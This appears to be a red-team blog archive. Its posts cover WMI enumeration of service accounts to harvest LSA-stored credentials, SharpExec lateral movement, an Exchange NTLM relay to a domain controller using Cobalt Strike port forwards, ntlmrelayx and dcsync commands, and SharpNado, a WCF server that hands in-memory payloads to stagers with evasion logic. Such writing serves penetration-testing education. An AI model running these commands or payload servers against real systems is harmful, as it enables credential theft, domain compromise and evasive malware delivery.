
Tuesday, August 20, 2019

Finding Hidden Treasure on Owned Boxes: Post-Exploitation Enumeration with wmiServSessEnum


TLDR: We can use WMI queries to enumerate accounts configured to run any service on a box (even non-started / disabled), as well as perform live session enumeration.  Info on running the tool is in the bottom section.


Background


On a recent engagement I had gotten local admin privileges on ~20 boxes, and after querying active sessions on them turned up nothing interesting, I was ready to look for other potential escalation paths.  I ran secretsdump against several of the systems to grab local account hashes and found that, in the process, I had also obtained plaintext credentials for a domain account that was not mentioned in any of the session enumeration information I had pulled.  This got me thinking about how that was possible, as well as how I could more reliably hunt for similar configurations on other systems I could remotely execute code on.

First, to explain what was going on – the NetWkstaUserEnum WINAPI function used by a majority of session enumeration tools is great at what it does, but only pulls data for active sessions on the remote system (interactive, service, and batch logins).  However, if a service is configured on the system but is currently not running, it will not be listed as a current session when enumerating the system.  This makes sense, as a non-running service has no processes associated with it.  After further investigation of the systems in question, I validated this is indeed what happened, as each of the systems was configured with a stopped service that would run using non-default credentials.

I’ve included an example below showing this in practice on a lab system using the GetNetLoggedOnUsers() functionality of @Cobbr_io’s SharpSploit, which uses the NetWkstaUserEnum WINAPI function to query sessions on a remote system, and a test service I configured (TestService) to run as the local ‘admin’ user on the box.  It shows that when the service is not running, the admin user is not enumerated (as expected):
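For reference, here's a minimal C# sketch (not the SharpSploit code itself) of how NetWkstaUserEnum-based session enumeration typically works; the target IP is a placeholder and error handling is kept to the bare minimum:

    using System;
    using System.Runtime.InteropServices;

    class SessionEnum
    {
        // WKSTA_USER_INFO_1 holds the username, logon domain, and logon server for each active session
        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        struct WKSTA_USER_INFO_1
        {
            public string wkui1_username;
            public string wkui1_logon_domain;
            public string wkui1_oth_domains;
            public string wkui1_logon_server;
        }

        [DllImport("netapi32.dll", CharSet = CharSet.Unicode)]
        static extern int NetWkstaUserEnum(string servername, int level, out IntPtr bufptr,
            int prefmaxlen, out int entriesread, out int totalentries, ref int resumehandle);

        [DllImport("netapi32.dll")]
        static extern int NetApiBufferFree(IntPtr buffer);

        static void Main()
        {
            string target = "192.168.1.50";   // hypothetical target
            IntPtr buf;
            int read, total, resume = 0;

            // Level 1, MAX_PREFERRED_LENGTH (-1); only *active* sessions come back
            int status = NetWkstaUserEnum(target, 1, out buf, -1, out read, out total, ref resume);
            if (status != 0) { Console.WriteLine("NetWkstaUserEnum failed: " + status); return; }

            IntPtr current = buf;
            for (int i = 0; i < read; i++)
            {
                var info = Marshal.PtrToStructure<WKSTA_USER_INFO_1>(current);
                Console.WriteLine(info.wkui1_logon_domain + "\\" + info.wkui1_username);
                current = IntPtr.Add(current, Marshal.SizeOf<WKSTA_USER_INFO_1>());
            }
            NetApiBufferFree(buf);
        }
    }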



For a bit more context on why this matters to us at all, we have to take a look at how credentials for service accounts are cached by Windows.  When a service is configured with a set of credentials to run as, the OS needs to store them so they don’t have to be re-entered every reboot / every time the service is run.  Windows stores these service account credentials within the HKEY_LOCAL_MACHINE\Security registry hive, in an encrypted storage space known as LSA Secrets.  However, the passwords themselves, although encrypted, are stored as plaintext values (as opposed to NTLM hashes).  Items stored in this space are only readable by NT AUTHORITY\SYSTEM by default, but users with administrative rights on the system can create a backup of the registry hive that can subsequently be accessed and decrypted to extract the data contained within.  As the screengrab below shows, the credentials are sitting in LSA Secrets, ready to be used whenever next needed.
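As a point of reference, service account secrets live under HKLM\SECURITY\Policy\Secrets in keys named _SC_<ServiceName>.  A quick way to see which services on a box have a stored secret (a sketch, assuming you have already elevated to SYSTEM, e.g. via psexec -s) looks like this:

    using System;
    using Microsoft.Win32;

    class LsaSecretNames
    {
        static void Main()
        {
            // Only NT AUTHORITY\SYSTEM can read this key; admins have to elevate or back up the hive first
            using (var secrets = Registry.LocalMachine.OpenSubKey(@"SECURITY\Policy\Secrets"))
            {
                if (secrets == null) { Console.WriteLine("Access denied - run as SYSTEM"); return; }

                foreach (var name in secrets.GetSubKeyNames())
                {
                    // Service account secrets are stored under keys named _SC_<ServiceName>
                    if (name.StartsWith("_SC_"))
                        Console.WriteLine(name);
                }
            }
        }
    }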


And if we dump the contents of LSA secrets, we see we can actually retrieve the plaintext password for the account configured to run the service:


So at this point I was a bit stumped: how could I quickly and reliably enumerate accounts configured to run services on a relatively large number of remote systems?  It’s not really a best practice to start randomly secretsdumping boxes, and even if you threw opsec concerns to the wind, it would still take a relatively long time if you wanted to dump anything more than just a few systems.  With that in mind, I wanted something that would ideally be agentless and could be run in a multi-threaded process to increase collection speed against multiple systems.  I settled on writing something that would check these boxes in C#, primarily as that’s what I’ve been doing the majority of my development in lately.



Building the Tool



Note: This section doesn’t have anything critical on the functionality or usage of the tool, but instead outlines the development process and roadblocks I ran into as I built it.  If this doesn’t interest you, I recommend scrolling through to the next section.

When I first sat down to write this tool, I thought WMI would be a good candidate to use for collection, as I had some knowledge of the Win32_Service class and figured it would be pretty easy to pull the needed information from the remote system.  As I prepared to start coding, I checked out similar projects that implemented WMI connectivity in .NET applications.  From an offensive tooling standpoint, I didn’t find too much outside of tools designed to facilitate code execution, and overwhelmingly they appeared to use the older System.Management namespace to build their WMI objects.  In my reading of the Microsoft docs, I found that the newer Microsoft.Management.Infrastructure namespace was the recommended way to access WMI.
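For anyone unfamiliar with that namespace, the core pattern is roughly the following (a hedged sketch rather than wmiServSessEnum's exact code; the target IP and credentials are placeholders):

    using System;
    using System.Security;
    using Microsoft.Management.Infrastructure;
    using Microsoft.Management.Infrastructure.Options;

    class WmiServiceQuery
    {
        static void Main()
        {
            // Hypothetical target / credentials for illustration
            var password = new SecureString();
            foreach (char c in "P@55w0rd") password.AppendChar(c);
            var creds = new CimCredential(PasswordAuthenticationMechanism.Default, "LAB", "admin", password);

            var options = new DComSessionOptions();      // WMI over DCOM/RPC
            options.AddDestinationCredentials(creds);

            using (CimSession session = CimSession.Create("192.168.1.50", options))
            {
                const string query = "SELECT Name, StartName, State FROM Win32_Service";
                foreach (CimInstance svc in session.QueryInstances(@"root\cimv2", "WQL", query))
                {
                    Console.WriteLine("{0} | {1} | {2}",
                        svc.CimInstanceProperties["Name"].Value,
                        svc.CimInstanceProperties["StartName"].Value,
                        svc.CimInstanceProperties["State"].Value);
                }
            }
        }
    }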


As I began to build out the functionality of the tool and started exploring other WMI classes, I figured it would make sense to extend the tool to also include optional enumeration of sessions on the system via WMI, similar to the sessionEnum functionality seen earlier through SharpSploit.  To explore various WMI classes I used WMI Explorer (https://github.com/vinaypamnani/wmie2/releases), which provides a super helpful interface that allows you to browse WMI classes and get information on specific properties & methods.


Through this I found the Win32_LoggedOnUser WMI class.  At first it seemed like this would be exactly what was needed for enumerating active sessions, and my initial tests worked great: I log in with user1, user1 shows up when I query the class; I log in with user2, user1 & user2 now show up when I query the class.  The issue came when I logged off with user2 and queried the class again; user2 still showed up as having a session on the system.  I tried giving it a few minutes, thinking that the session was temporarily cached on log-off, but user2 still appeared to be logged in when querying the class.  This led me to a bunch of googling and the unfortunate conclusion that the Win32_LoggedOnUser class tracks ALL login sessions since last reboot, including ‘stale’ sessions that no longer exist.  This isn’t great for us, as these stale sessions do not retain cached credentials in memory by default, potentially leading to a plethora of false positives based on old logins.  There are definitely operational uses for this information, e.g. looking for a system where there have been administrative logins at some point since last reboot – likely within the past month – and targeting it for long-term surveillance or persistence with the theory being that an admin may log in there again; however, those uses are outside the scope of this tool.

Each session object returned when querying the Win32_LoggedOnUser class has two properties: an antecedent and a dependent.  The antecedent is the value that contains the ‘human-readable’ information regarding a specific session – the hostname, domain, etc.  The dependent contains a ‘loginID’ value, a unique int corresponding to the specific instance of an account logging into the system.  If a single user logs in & out multiple times prior to a reboot, each instance will receive a unique loginID and thus be tracked independently by the Win32_LoggedOnUser class.


There wasn’t a whole lot I could do directly with the LoggedOnUser class to filter down to only live sessions, but through a bit more exploration of WMI classes I landed on the Win32_SessionProcess class.  Similar to LoggedOnUser, this class also returns only an antecedent and a dependent.  However, the antecedent and dependent values returned for objects of the SessionProcess class are different: the antecedent contains the LoginID tied to each active process on the system, and the dependent contains a handle to each of these processes.  Although by themselves there isn’t much that can be done with these values, the LoginIDs returned by SessionProcess can be cross-referenced against the LoginIDs associated with LoggedOnUser objects, giving a listing of actual live sessions (those that have at least one running process associated with their LoginID).
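A rough sketch of that cross-referencing logic (again, not the tool's exact code; how the association endpoints are surfaced can vary, so the LoginID parsing below is intentionally defensive – the WMI property itself is named LogonId):

    using System;
    using System.Collections.Generic;
    using System.Text.RegularExpressions;
    using Microsoft.Management.Infrastructure;

    class LiveSessionEnum
    {
        // The Antecedent/Dependent reference may come back as an embedded CimInstance or as a
        // WMI path string depending on the transport, so handle both (assumption).
        static string LogonIdFromRef(object refValue)
        {
            if (refValue == null) return null;
            if (refValue is CimInstance inst)
                return inst.CimInstanceProperties["LogonId"].Value?.ToString();
            var m = Regex.Match(refValue.ToString(), "LogonId\\s*=\\s*\"?(\\d+)");
            return m.Success ? m.Groups[1].Value : null;
        }

        static void Main()
        {
            using (CimSession session = CimSession.Create("192.168.1.50"))   // hypothetical target
            {
                // 1. LogonIds that currently own at least one process = live sessions
                var liveIds = new HashSet<string>();
                foreach (var sp in session.QueryInstances(@"root\cimv2", "WQL", "SELECT * FROM Win32_SessionProcess"))
                {
                    var id = LogonIdFromRef(sp.CimInstanceProperties["Antecedent"].Value);
                    if (id != null) liveIds.Add(id);
                }

                // 2. Only report LoggedOnUser entries whose LogonId is backed by a running process
                foreach (var lu in session.QueryInstances(@"root\cimv2", "WQL", "SELECT * FROM Win32_LoggedOnUser"))
                {
                    var id = LogonIdFromRef(lu.CimInstanceProperties["Dependent"].Value);
                    if (id != null && liveIds.Contains(id))
                        Console.WriteLine(lu.CimInstanceProperties["Antecedent"].Value);   // account info
                }
            }
        }
    }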


Once this connection had been made, it was fairly straightforward to get session enumeration functionality up and running.  From there, everything was pretty much in its final state as far as functionality goes.  Things were looking good until I started using Wireshark to watch execution across the wire in real time.  When enumerating sessions using the NetWkstaUserEnum WINAPI function, approximately 15 packets were sent over the wire.  When running session enumeration over WMI, that number was up to ~200 packets.  Quite a bit larger, but it makes sense when considering that the session has to be set up and multiple requests have to be made (although if anyone can update the queries to shave this number further, I would be happy to include the changes).  However, when I ran service enumeration, packet counts shot up to a monstrous ~1700 per host.  This was simply too high for my liking, and I could imagine network congestion, downed boxes, etc. if this was run against too many hosts in parallel.




The breakthrough in getting the amount of traffic sent over the wire down was the realization that the WQL query sent to retrieve objects is processed server-side.  WMI connectivity using the Microsoft.Management.Infrastructure namespace involves creating a CimSession to a remote host, which in turn is queried using a WQL (WMI Query Language) query – a SQL-like statement that can be used to retrieve data based on certain criteria.  I had (mistakenly) assumed that filters applied to these queries (ex. select * from Win32_Service where startname like ‘%admin%’) would be applied to the data after it was returned to our system; in other words, that all the data would be pulled back across the wire and then filtered using the given rules prior to displaying.  Luckily, I found this not to be the case: the entire query is sent to the remote host, where it is processed on that system.  From there, only results that match the given filter are sent back over the wire to our system.  Almost all services can be filtered out, as we’re not interested in those running under ‘default’ accounts such as SYSTEM, LOCAL SERVICE, and NETWORK SERVICE.  With these new filters applied, traffic for service enumeration is down to a much more manageable ~170 packets per host (varying with the number of services identified).
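The filtered query ends up looking something like the following sketch (the exact filter wmiServSessEnum ships with may differ slightly):

    using Microsoft.Management.Infrastructure;

    static class ServiceQueries
    {
        // Let the remote host do the filtering: only services with a non-default StartName come back
        public const string NonDefaultServiceAccounts =
            "SELECT Name, StartName, State, PathName FROM Win32_Service " +
            "WHERE StartName IS NOT NULL " +
            "AND NOT (StartName LIKE '%LocalSystem%' " +
            "OR StartName LIKE '%LocalService%' " +
            "OR StartName LIKE '%NetworkService%')";

        public static void Run(CimSession session)
        {
            foreach (CimInstance svc in session.QueryInstances(@"root\cimv2", "WQL", NonDefaultServiceAccounts))
                System.Console.WriteLine(svc.CimInstanceProperties["StartName"].Value + " runs " +
                                         svc.CimInstanceProperties["Name"].Value);
        }
    }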


One other interesting point became apparent as I analyzed traffic from both WMI and API-based enumeration methods: this method uses solely RPC connections, whereas the API methods use SMB to remotely pull information.  There are definitely improvements that can be made here as well – API methods would likely be faster and may potentially be even lighter from a network traffic perspective (depending on what filtering can be done prior to returning service information), and the current queries could likely be refined to reduce traffic further.  Overall though, with this last hurdle overcome, I figured the tool was in a decent enough place to release.


wmiServSessEnum Usage


Like other tools that use WMI to connect to other systems, admin rights are required on the remote system.

A single IP or a comma-separated list of IPs must be entered on the command line when executing the tool, or alternatively a path to a file on the local system containing one target IP per line.  I looked into incorporating CIDR notation into the tool but ultimately decided against it, so as of now only specific IP addresses are supported.  Ideally this shouldn’t be a huge deal, as the addresses being tested are ones that you already have valid credentials for, meaning initial network enumeration has already occurred.

By default the tool will use whatever credentials your current session is running as, but it also accepts a username, domain, and plaintext password (use a domain of ‘.’ for a local user).

WmiServSessEnum can be run in several different modes:
  • sessions – similar to other user enumeration methods, will return a list of active sessions on the remote system
  • services – returns a list (if any) of non-default accounts configured to run services on the remote system
  • all (default) – runs both

Flags should be input in the format –u=UserName, etc.
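As a purely hypothetical example of what an invocation might look like (flag names other than –u are guesses and may not match the released tool; check the repo's README):

    :: hypothetical flag names - confirm against the wmiServSessEnum README/help output
    wmiServSessEnum.exe -ips=192.168.1.50,192.168.1.51 -u=UserName -d=domain.local -p=Password123 -m=all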

When everything works you should get something back that looks like this when running against a remote system:

Friday, April 5, 2019

SharpExec - Lateral Movement With Your Favorite .NET Bling

TL;DR:

SharpExec is an offensive security C# tool designed to aid with lateral movement. While the techniques used are not groundbreaking or new by any means, every environment is different and what works for one situation might not work for the next.  This tool is a combination of code I have been using over the years when I needed to move laterally in a Windows environment and, due to various circumstances, traditional tools weren't an option.  Below I will go over functionality, benefits, things to be aware of, etc.  If you are already tired of reading this, you can grab the source code or compiled tool from my github here: https://github.com/anthemtotheego/SharpExec

Current modules:
  • WMIExec - Semi-Interactive shell that runs as the user. Best described as a less mature version of Impacket's wmiexec.py tool.
  • SMBExec - Semi-Interactive shell that runs as NT Authority\System.  Best described as a less mature version of Impacket's smbexec.py tool.
  • PSExec (like functionality) - Gives the operator the ability to execute remote commands as NT Authority\System or upload a file and execute it with or without arguments as NT Authority\System.
  • WMI - Gives the operator the ability to execute remote commands as the user or upload a file and execute it with or without arguments as the user.
  • In the future I would like to add lateral movement through DCOM and pass-the-hash functionality
A few benefits:
  • Doesn't need to be supplied credentials if the current user running the program has the appropriate permissions (admin rights) to other remote systems.  This can come in handy when you compromise a system but don't have valid credentials yet.
  • The tool itself can be easily executed in memory, for example, using Cobalt Strike or SharpCradle.
  • Tools that are similar can behave differently enough that one tool's behavior gets flagged while the other one doesn't.
  • Sometimes you just don't feel like dealing with SSH tunneling or port forwarding just to run a specific tool and having other options is great.  
Things to be aware of:

When running the PSExec and SMBExec modules, please be aware that these are extremely noisy.  There will be a ton of log activity, so if you are testing a mature organization and your goal is not to get caught, you don't want to run these. Unfortunately, though, many organizations still don't catch this type of activity, and in most cases you are probably fine running these modules.  For a great rundown on how these types of tools work, check out this blog series by @ropnop -  https://blog.ropnop.com/using-credentials-to-own-windows-boxes/

Like other tools with similar functionality, administrative rights are required.

Examples:

I have always been a fan of individuals who provide clear examples of using their tools and what behavior to expect, over the "here is a tool, I wish you the best of luck" approach.  So in this section I have tried to supply screenshots of various examples of using SharpExec.  Feel free to reach out to me on twitter @anthemtotheego if something doesn't make sense or is confusing.  This goes for any of my projects.

Running SharpExec without any arguments prints the help menu



The below example starts a semi-interactive shell to a remote domain joined system from a non-domain joined system using the WMIExec module
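Something along these lines would be typical (a hypothetical invocation – the flag names are from memory and may not exactly match the current release, so check the help menu above):

    :: hypothetical flag names - confirm against SharpExec's help menu
    SharpExec.exe -m=wmiexec -i=192.168.1.50 -u=targetUser -p=Password123 -d=lab.local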

The below example starts a semi-interactive shell as user1 on the remote system using no username/password and then uses the get command available within the WMIExec/SMBExec modules to download a file from the remote system's current directory to your local system



The below example starts a semi-interactive shell as NT Authority\System on the remote system using no username/password and then uses the put command available within the WMIExec/SMBExec modules to upload a file from your local system to the remote system



The below example uploads the local binary noPowershell-noargs.exe to the remote system's C:\ drive and executes the binary via the WMI module.  It then waits for the user to press Enter before removing the file off of the remote system

The below example uses the PSExec module to execute a PowerShell Empire payload on the remote system via cmd.exe.  This will spawn a PowerShell Empire shell running as NT Authority\System

The below example uses the tool SharpCradle.exe to pull SharpExec.exe into memory and execute the WMIExec module to gain a semi-interactive shell on the remote system

Conclusion:

Hopefully this has been a good tutorial on a few ways to use SharpExec.  Till next time and happy hacking!

Link to tools:

SharpExec - https://github.com/anthemtotheego/SharpExec

SharpExec Compiled Binaries - https://github.com/anthemtotheego/SharpExec/tree/master/CompiledBinaries

SharpCradle GitHub - https://github.com/anthemtotheego/SharpCradle

Thursday, January 31, 2019

Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv


TL;DR: A new take on the recently released Exchange privilege escalation attack, allowing for remote usage without needing to drop files to disk, have local admin rights, or know any passwords at all.  Any shell on a user account with a mailbox = domain admin.  I wrote a PowerShell implementation of PrivExchange that uses the credentials of the current user to authenticate to Exchange.  Find it here: https://github.com/G0ldenGunSec/PowerPriv



The Exchange attack that @_dirkjan released last week (https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin) provides an extremely quick path to full domain control on most networks, especially those on which we already have a device we can run our tools from, such as during an internal network penetration test.  However, I saw a bit of a gap from the perspective of a more red-team-focused attack scenario, in which we often wouldn't have a box on the internal client network that we can run Python scripts on (such as ntlmrelayx and PrivExchange) without either installing Python libraries or compiling the scripts to binaries and dropping them to disk to run.  Additionally, we may not have a user's plaintext password or NTLM hash to run scripts with remotely via proxychains.

Trying to find a more effective solution for this scenario, I wrote a PowerShell implementation of PrivExchange called PowerPriv that uses the credentials of the current user to authenticate to the Exchange server.  This gets around the problem of needing credentials, as we’ll now just use the already-compromised account to authenticate for us.  However, this was really only a first step, as it still required that we relay to the domain controller through ntlmrelayx, meaning that we would still need a box on the network running Linux / need to install Python / etc.  To put the rest of the pieces together, I used a bunch of the great tunneling functionality that comes with Cobalt Strike to set up a relay for the inbound NTLM authentication request (via HTTP) from the Exchange server, through our compromised host system, to the Cobalt Strike server, and back out to the target domain controller (via LDAP).  At a high level, this is what we’re doing:
 

So, in more depth, what are we actually doing here?  To begin, let’s get a ‘compromised’ system and check who the local admins are:


Cool, we’re running as ‘tim’, a user who is not currently an admin on this system, but that shouldn’t matter.  Next, let's get our forwarding set up using the 'socks' + 'rportfwd' commands in Cobalt Strike and the /etc/proxychains.conf file:



We’re doing a few things here: setting up a reverse port forward to send traffic from port 80 on the compromised system to port 80 on our attacker system, and then setting up a SOCKS proxy to forward traffic back out through the compromised system over port 36529 on our box (the specific port used doesn’t matter).

Once we've configured these, we can use proxychains to forward traffic through our SOCKS proxy set up on port 36259.  To perform the relay, we'll run ntlmrelayx, forwarding traffic through proxychains in order to get it back to the target environment. 
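For reference, the moving pieces look roughly like this (a sketch – IPs and ports are placeholders, and your setup will differ):

    # In the Beacon on the compromised host: forward inbound port 80 back to our attacker system
    rportfwd 80 <attacker IP> 80
    # ...and stand up a SOCKS proxy so our outbound traffic rides back out through the compromised host
    socks 36259

    # /etc/proxychains.conf on the attack box
    socks4 127.0.0.1 36259

    # Relay the inbound HTTP auth from Exchange out to LDAP on the DC, escalating our user
    proxychains ntlmrelayx.py -t ldap://<DC IP> --escalate-user tim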


After this is up and running, we are ready to kick off the attack.  I’m using the PowerShell implementation of PrivExchange that I wrote called PowerPriv to authenticate using Tim's credentials.  In this example, all we need are the IPs of the Exchange server and the system which we currently have a shell on, since our compromised system will be relaying the incoming request to our attack server:



After this, we sit back and wait a minute for the NTLM authentication request to come back from the remote Exchange server:



Looks like our attack succeeded. Let's see if Tim can now perform a dcsync and get another user’s NTLM hash, even though Tim is only a lowly domain user:



A resounding success!  All without ever needing to know what Tim’s password is, perform any poisoning attacks, or drop files onto his system.   As to why we’re using the Cobalt Strike dcsync module vs secretsdump – in this scenario we do not have a plaintext password or NTLM hash for Tim (or any user), which would be required if we want to run secretsdump from our box via proxychains.  If you do have credentials, you can definitely use whichever method you prefer.

A few gotchas from during this process:
  • Make sure to use an appropriate type of malleable profile for your beacon. Don’t try and be fancy and send data over URIs or parameters.  Due to the nature of the relayed authentication, we need to be able to quickly get the authentication request and forward it back out.  I also completed all testing using an interactive beacon; a 5-minute sleep isn’t going to work for this one.
  • I was initially having issues getting the dcsync working when using an FQDN (vs. the netbios name) of my target domain.  This was likely due to how I configured my naming conventions on my local domain, but something to be aware of.
  • In this example, my Cobalt Strike teamserver was running on the same box as my Cobalt Strike operator console (I was not connecting to a remote team server).  If you have a remote team server, that is where you would need to set up your relay, as that is where the reverse port forward would be dumped out to. (May need further testing)


Notes and links:
@_Dirkjan’s blog which covers the actual Exchange priv esc bug that he found in greater depth: https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/

Github Repo for PowerPriv: https://github.com/G0ldenGunSec/PowerPriv

Github Repo for ntlmrelayx: https://github.com/SecureAuthCorp/impacket

Cobalt Strike resources on port fwd’ing and SOCKS proxies: https://www.youtube.com/watch?v=bwq0ToNPCtg

*This technique was demonstrated in the article with Cobalt Strike.  However, this same vector is possible using other agents that support port forwarding and proxying, such as Meterpreter.

Wednesday, December 19, 2018

SharpNado - Teaching an old dog evil tricks using .NET Remoting or WCF to host smarter and dynamic payloads

TL;DR:

SharpNado is a proof-of-concept tool that demonstrates how one could use .NET Remoting or Windows Communication Foundation (WCF) to host smarter and dynamic .NET payloads.  SharpNado is not meant to be a fully functioning, robust payload delivery system, nor is it anything groundbreaking. It's merely something to get the creative juices flowing on how one could use these technologies, or others, to create dynamic and hopefully smarter payloads. I have provided a few simple examples of how this could be used to either dynamically execute base64 assemblies in memory or dynamically compile source code and execute it in memory.  This, however, could be expanded upon to include different kinds of stagers, payloads, protocols, etc.

So, what is WCF and .NET Remoting?

While going over these in depth is beyond the scope of this blog, Microsoft describes Windows Communication Foundation as a framework for building service-oriented applications, and .NET Remoting as a framework that allows objects living in different AppDomains, processes, and machines to communicate with each other.  For the sake of simplicity, let's just say one of their use cases is allowing two applications living on different systems to share information back and forth with each other. You can read more about them here:

WCF

.NET Remoting

 A few examples of how this could be useful:

1. Smarter payloads without the bulk

What do I mean by this?  Since WCF and .NET Remoting are designed for communication between applications, they allow us to build in logic server side to make smarter decisions depending on what information the client (stager) sends back to the server.  This means our stager can stay small and flexible, but we can also build in complex rules server side that allow us to change what the stager executes depending on environmental situations.  A very simple example of payload logic would be the classic "if the domain user equals X, fire; if not, don't".  While this doesn't seem very climactic, you could easily build in more complex rules.  For example, if the domain user equals X, the internal domain is correct, and user X has administrative rights, run payload Y; or if user X is a standard user and the internal domain is correct, run payload Z.  Adding to this, we could say that if user X is correct but the internal domain is a mismatch, send back the correct internal domain and let me choose whether I want to fire the payload or not.  These back-end rules can be as simple or complex as you like.  I have provided a simple sandbox evasion example with SharpNado that could be expanded upon, and a quick walkthrough of it in the examples section below.
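To make that concrete, the server-side rules might look something like this minimal sketch (not SharpNado's actual code – the domain/user names and payload files are made up):

    using System;
    using System.IO;

    public class PayloadRules
    {
        // The stager reports where/who it is running as; the server decides what (if anything) to return
        public string GetPayload(string domain, string user, bool isAdmin)
        {
            if (!domain.Equals("CORP", StringComparison.OrdinalIgnoreCase))
                return string.Empty;                              // wrong environment: hand back nothing

            if (user.Equals("targetUser", StringComparison.OrdinalIgnoreCase) && isAdmin)
                return File.ReadAllText("payloadY.xml");          // privileged target: full payload

            if (user.Equals("targetUser", StringComparison.OrdinalIgnoreCase))
                return File.ReadAllText("payloadZ.xml");          // standard user: lighter payload

            return string.Empty;
        }
    }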

2. Payloads can be dynamic and quickly changed on the fly:

Before diving into this, let's talk about some traditional ways of payload delivery first and then get into how using a technology like WCF or .NET Remoting could be helpful.  In the past, and even still today, many people hard-code their malicious code into the payload sent, often using some form of encryption that only decrypts and executes upon meeting some environmental variable; or they use a staged approach where a non-malicious stager reaches out to the web, retrieves the malicious code, and executes it as long as environmental variables align.  The above examples are fine and still work well even today, and I am in no way tearing these down or saying better ways don't exist.  I am just using them as a starting point to show how I believe the below could be used as a helpful technique and up the game a bit, so just roll with it.

So what are a few of the pain points of the traditional payload delivery methods?  Well with the hard-coded payload, we usually want to keep our payloads small so the complexity of our malicious code we execute is minimal, hence the reason many use a stager as the first step of our payload.  Secondly, if we sent out 10 payloads and the first one gets caught by end point protection, then even if the other 9 also get executed by their target, they too will fail.  So, we would have to create a new payload, pick 10 new targets and again hope for the best.

Using WCF or .NET Remoting we can easily create a light stager that allows us to quickly switch between what the stager will execute.  We can do this either by back-end server logic as discussed above or by quickly setting different payloads within the SharpNado console.  So, let's say our first payload gets blocked by endpoint protection.  Since we already know our stager did try to execute our first payload, due to the way the stager and server communicate, we can use our deductive reasoning skills to conclude that our stager is good but the malicious code it tried to execute got caught.  We can quickly, in the console, switch our payload to our super stealthy payload, and the next time any of the stagers execute, the super stealthy payload will fire instead of the original payload that got caught.  This saves us the hassle of sending a new payload to new targets.  I have provided simple examples of how to do this with SharpNado that could be expanded upon, and a quick walkthrough of it in the examples section below.

3. Less complex to setup:

You might be thinking to yourself that you could do all this with mod_rewrite rules, and while that is absolutely true, mod_rewrite rules can be a little more complex and time-consuming to set up.  This is not meant to replace mod_rewrite or anything.  Long live mod_rewrite!  I am just pointing out that writing your back-end rules in a language like C# can allow for easier-to-follow rules, modularization, and data parsing/presentation.

4. Payloads aren't directly exposed:

What do I mean by this?  You can't just point a web browser at your server IP and see payloads hanging out in some open web directory to be analyzed/downloaded.  In order to capture payloads, you would have to have some form of MiTM between the stager and the server.  This is because when using WCF or .NET Remoting, the malicious code (payload) you want your stager to execute, along with any complex logic you want to run, sits behind your remote server interface.  That remote interface exposes only the remote server-side methods, which can then be called by your stager.  Now, if at this point you are thinking WTF, I encourage you to review the above links and dive deeper into how WCF or .NET Remoting works, as there are many people who explain it and understand it better than I ever will.
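In WCF terms, the stager can only see whatever you choose to expose on the service contract – something shaped like this sketch (hypothetical names, not SharpNado's actual interface):

    using System.ServiceModel;

    [ServiceContract]
    public interface IEvilService
    {
        // Richer check: the stager reports who/where it is running
        [OperationContract]
        string GetPayload(string domain, string user, bool isAdmin);

        // Simpler check used later in the sandbox-evasion walkthrough: 1 = expected user, 0 = anyone else
        [OperationContract]
        string CheckTarget(int userFlag);
    }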

Keep in mind that you would still want to encrypt all of your payloads before they are sent over the wire to better protect them.  You would also want to use other evasion techniques – for example, checking the number of times the stager has been called or how much time has passed since the stager was sent, etc.

5. Been around a while:

.NET Remoting and WCF have been around a long time. There are tons of examples out there from developers on lots of ways to use this technology legitimately and it is probably a pretty safe bet that there are still a lot of organizations using this technology in legit applications. Like you, I like exposing ways one might do evil with things people use for legit purposes and hopefully bring them to light. Lastly, the above concepts could be used with other technologies as well, this just highlights one of many ways to accomplish the same goal.

Examples:

Simple dynamic + encrypted payload example:

In the first example we will use SharpNado to host a base64 version of SharpSploitConsole and execute Mimikatz's logonpasswords function.  First, we will set up the XML payload template that the server will be able to use when our stager executes.  Payload template examples can be found on GitHub in the Payloads folder.  Keep in mind that the ultimate goal would be to have many payload templates already set up that you could quickly switch between. The below screenshots give an example of what the template would look like.

Template example:

This is what it would look like after pasting in base64 code and setting arguments:

Once we have our template payload set up, we can go ahead and run SharpNado_x64.exe (with Administrator rights) and set up the listening service that our stager will call out to. In this example we will use WCF over HTTP on port 8080, so our stager should be set up to connect to http://192.168.55.250:8080/Evil.  I would like to note two things here.  First, with a little bit of work upfront server side, this could be modified to support HTTPS; secondly, SharpNado does not depend on the templates being set up prior to running.  You can add/delete/modify templates at any time while the server is running, using whatever text editor you would like.
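Under the hood, self-hosting a WCF endpoint like that boils down to something like the sketch below (it assumes an EvilService class implementing the IEvilService contract sketched earlier; SharpNado's own implementation will differ):

    using System;
    using System.ServiceModel;

    class Host
    {
        static void Main()
        {
            // HTTP URL registration is why this needs to run with Administrator rights.
            // EvilService / IEvilService come from the contract sketch above (hypothetical names).
            var host = new ServiceHost(typeof(EvilService), new Uri("http://192.168.55.250:8080"));
            host.AddServiceEndpoint(typeof(IEvilService), new BasicHttpBinding(), "Evil");
            host.Open();

            Console.WriteLine("Listening on http://192.168.55.250:8080/Evil - press Enter to stop.");
            Console.ReadLine();
            host.Close();
        }
    }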

Now let's see what payloads we currently have available.  Keep in mind you may use any naming scheme you would like for your payloads.  I suggest naming payloads and stagers what makes most sense to you.  I only named them this way to make it easier to follow along.









In this example I will be using the b64SharpSploitConsole payload and have decided that I want the payload to be encrypted server side and decrypted client side using the super secure password P@55w0rd.  I would like to note here (outlined in red) that it is important for you to set your payload directory correctly.  This directory is what SharpNado uses to pull payloads.  A good way to test this is to run the command "show payloads" and if your payloads show up, you know you set it correctly.

Lastly, we will setup our stager.  Since I am deciding to encrypt our payload, I will be using the example SharpNado_HTTP_WCF_Base64_Encrypted.cs stager example found in the Stagers folder on GitHub.  I will simply be compiling this and running the stager exe but this could be delivered via .NetToJScript or by some other means if you like.

Now that we have compiled our stager, we will start the SharpNado service by issuing the "run" command.  This shows us what interface is up and what the service is listening on, so it is good to check this to make sure, again, that everything is set up correctly.




Now when our stager gets executed, we should see the below.

And on our server side we can see that the encrypted server method was indeed called by our stager.  Keep in mind, we can build in as much server logic as we like.  This is just an example.



Now for demo purposes, I will quickly change the payload to b64NoPowershell_ipconfig_1, and when we run the exact same stager again, it will instead return our ipconfig information.  Again, this is only a simple demonstration of how you can quickly change out payloads.











Simple sandbox evade example:

